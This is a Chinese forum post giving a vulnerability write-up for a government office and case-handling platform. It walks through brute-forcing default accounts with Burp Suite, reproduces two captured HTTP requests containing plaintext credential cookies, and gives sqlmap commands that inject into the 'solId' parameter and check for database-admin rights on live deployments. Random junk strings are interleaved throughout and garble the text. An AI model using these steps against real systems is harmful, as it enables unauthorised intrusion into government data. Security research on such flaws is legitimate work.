|
) N- B$ _! u9 {* x
) u. q/ @) t/ R/ p4 v" ]- a" d 3 v/ J/ r5 Z- [; L
5 Q& X# t8 T2 N# p+ k$ R p/ U 平台简介:
) t. T* n$ E O ) j/ h: J8 e, \# L
& D( A5 |8 E/ }4 g9 q) C& K 0 U: F5 r0 n3 I+ t4 z9 H
2 P- H& g6 q# u; ]9 h+ L5 @. S. Q5 g( z7 |
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: r$ `! C/ C. Q# g# i( i
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. U) e* O. P9 d- ?% q: ~, A: Y
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 F% v% F: K$ d
& J" k; q! C; q, t- k' v, p2 A, P) q
6 c, N6 k7 t& @0 i8 i % S& j; K2 [$ R
& i$ ?. r" U1 P" b/ X; O 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; W, s( }- c9 T5 ?/ U- X
/ {. I9 ^9 c# E# z2 y
# ^# |/ J% a* b
4 i2 E5 O/ h7 _: G0 t7 [8 r 5 H0 Z/ S R6 V/ J# W* Z- V+ r, H
" `4 s4 X* K! H$ G3 a' ]1 A http://1.1.1.1:7197/cap-aco/#(案例2-)
" L2 f- P6 D/ i( {! \( a5 ]" y
4 t/ M: B' h5 Z4 e# S
x( n; [6 ^6 T' d http://www.XXOO.com (案例1-官网网站)* I; S% e3 A' o) x8 A
- W+ k! E6 |+ o6 J- D) _0 C
8 s; C0 K* [0 f , i; o1 s# @, X/ j4 ?1 ?$ t
4 y9 Z- S# U/ S6 q
. H% \$ k1 l" P8 H s' p
漏洞详情:
1 V- e8 }; F8 L F+ c! t! C2 K; c / R' f, a: U7 m* Y+ w$ W- ]
0 _& k$ ]$ E: @3 U 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' v" C Q6 S! H9 ^* Q
" {8 d: o( R% \) Y/ r: w
$ z- r* h$ O5 c" c1 r# A+ ] ?. ~# @ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
' W0 x9 p3 t( X4 G. e
2 i5 b% `" R0 c. v& i8 c) q1 b
8 C3 C2 Y' ^, W b; Z9 f 1 J: U0 X' d! s5 x. b5 \
, X j! _; }. z: V
\' T# c8 c5 v& W4 o9 M# u
) j) p6 E/ v* f4 q , i7 y1 T0 L+ l7 g( r
I* A7 ~3 r& H
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:. P2 h+ S3 _2 Q1 B
4 w4 M. g9 `- H n, G3 R& [' w- l$ \
. Z$ A$ [; ^1 t! D7 b7 |7 Q% G. b 1、案例1-官方网站
8 O- B& E* W7 C/ i$ F- R
; S9 M- }) \$ M
! f% U- l; e6 x- C8 q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1' |% t6 Q# g8 m5 ^! N
) N% W h' d' V% \
8 K3 G9 B' x5 s6 _
Host: www.XXOO.com
. P* S: l6 S, e! E/ C
; _# \- m2 }. \0 @& R$ j* ?" t: w; |( U# s
Proxy-Connection: Keep-Alive
/ J+ b0 g2 ?: n' {0 U, w i/ U 5 Q, ~% b5 p _* b
, `) i4 [1 T! U/ x' A* h
Accept: application/json, text/javascript, */*; q=0.01
q! K2 F8 v, [2 L5 p
, c) ^ B8 L9 j5 c O D+ l8 D. A2 @# b. e
Accept-Language: zh-CN
1 u7 n/ a( V6 U: P3 {; K3 f6 ? g* c, X8 C$ ?5 u
) G# x1 _3 C$ U' |5 ]$ X9 w Content-Type: application/json; Z4 z. I3 B7 F D
& g7 X( D' N. x D N# Y
; j) X5 b1 Q& Y3 W& j- n3 k$ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
0 a8 _6 J% i. w# E3 Q9 x; c' ]
+ h) b0 x5 v( O3 z/ c1 s) z6 }) N) h# I5 F; i* [" c
X-Requested-With: XMLHttpRequest
+ u9 L- b* b) m# h; } 8 T5 X( g3 s- T. }9 N
8 u, a$ f8 `( I, ]8 k, I
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
1 s- y& @- [1 q, m' q ( J; p9 B: U W4 H9 m
9 V8 v5 E _+ _" T( z! ^, `5 T Accept-Encoding: gzip, deflate, sdch% ]; Z' T! @2 {% k% R
4 z" {% T# q, j& i& L* O' }2 i, G4 c3 c
& w* E% H7 ~4 B- l2 l Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e8 f. O4 ^7 [. Z3 R2 i' D
% n, G7 C" w: P& v l9 {
. B$ _( a! @6 |# w; O 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ t) { d9 p7 U
. S4 y ^& \6 z; B) V5 ]& U
; Q+ }6 \: X- m) U" m$ _2 K% E6 t  2 M; L6 K: g, B$ k
6 {/ f: c0 L( W! s2 N+ P1 Z8 K6 K: I; T
 & [; P3 X9 q+ w2 }
2 G! k) Y: p8 u: Z8 }5 O# C" y" b% R
6 R8 y" s$ c* v1 C, X$ N/ i
( c4 y: p; o( ~; p2 S/ m7 b9 |
$ O2 i7 j* L2 b* D- v7 d5 G
. V9 r& R, J# Q
e. ^- v+ ~. f9 w8 j" o, g+ x . E9 c7 w9 f+ D7 @+ G5 a$ D
0 o1 m) G/ d& [
% q1 y6 c% f! \* l$ F7 L5 D
2 Z5 u8 y9 V& ~% H2 Q- p
$ G: u; d: M/ U: u f w! U 2、案例2-某天河云平台" _4 }3 \. V- G3 Z/ h Z
% M. U% {' R% @5 U% I* I4 a; g% W+ L# q8 g. |. A
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
Z" [# g0 [6 t 1 J7 ?/ R1 _5 W. W; q; a% p
) ~+ e; N- v/ Z: g! Y% c
Host: 1.1.1.:71977 i; O( Y! s3 ]& u+ L
& e, L9 P% f0 }; [ t0 j
3 U5 z8 `" e3 Z3 j ]: c e& ` Accept: application/json, text/javascript, */*; q=0.01# T+ J- s5 r& E2 X; \
; z$ p, f/ ]& G3 s
6 u! C( ~$ K9 r* p X-Requested-With: XMLHttpRequest: R; f9 _' V# T* L0 u/ A
- \) |, c0 r, c0 f& v
1 q F- _- p/ T$ E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0$ x" H! E4 ^: {( W8 G' @) r
- T1 i1 W( y% u: |
: L* @; W) r* D. ]6 I5 a) v Content-Type: application/json
) V( `( |% m) k( R" n 6 `2 j5 T R, P' K
8 Z- b/ `( @4 B0 U8 v
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10084 o0 p5 `" [) Y5 u" Q+ j
0 J# P* L4 Z4 a) i% ^6 k3 B
' p+ t- U# k3 p# r) Z
Accept-Language: zh-CN,zh;q=0.8
. K+ J6 a% f$ a
& B! `( X" \1 {+ N9 g- Y: {) R: L6 M- V9 G# \
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
) N3 D, q' t" N# j* x
$ B& I6 A4 l4 X# b8 ?; m
& A9 a5 B" G& t- o4 I+ ]: _. D Connection: close# h% W9 X* Q I: B$ ~2 o9 @ B, k
|$ Q0 r* p: X. ]. t7 V& ?5 M% J8 b
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
7 n; ^, A( F% m% r 1 B- z- e% T4 `& U9 w6 v0 r
" f1 @4 |' I0 u; r& ~2 l 
2 [$ X8 E- m. y: I2 }5 l l w9 `
, T+ t1 E& t7 m7 B0 p8 p. S. V4 a( ]* B
2 T3 O: g3 N; S" l- {! w
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对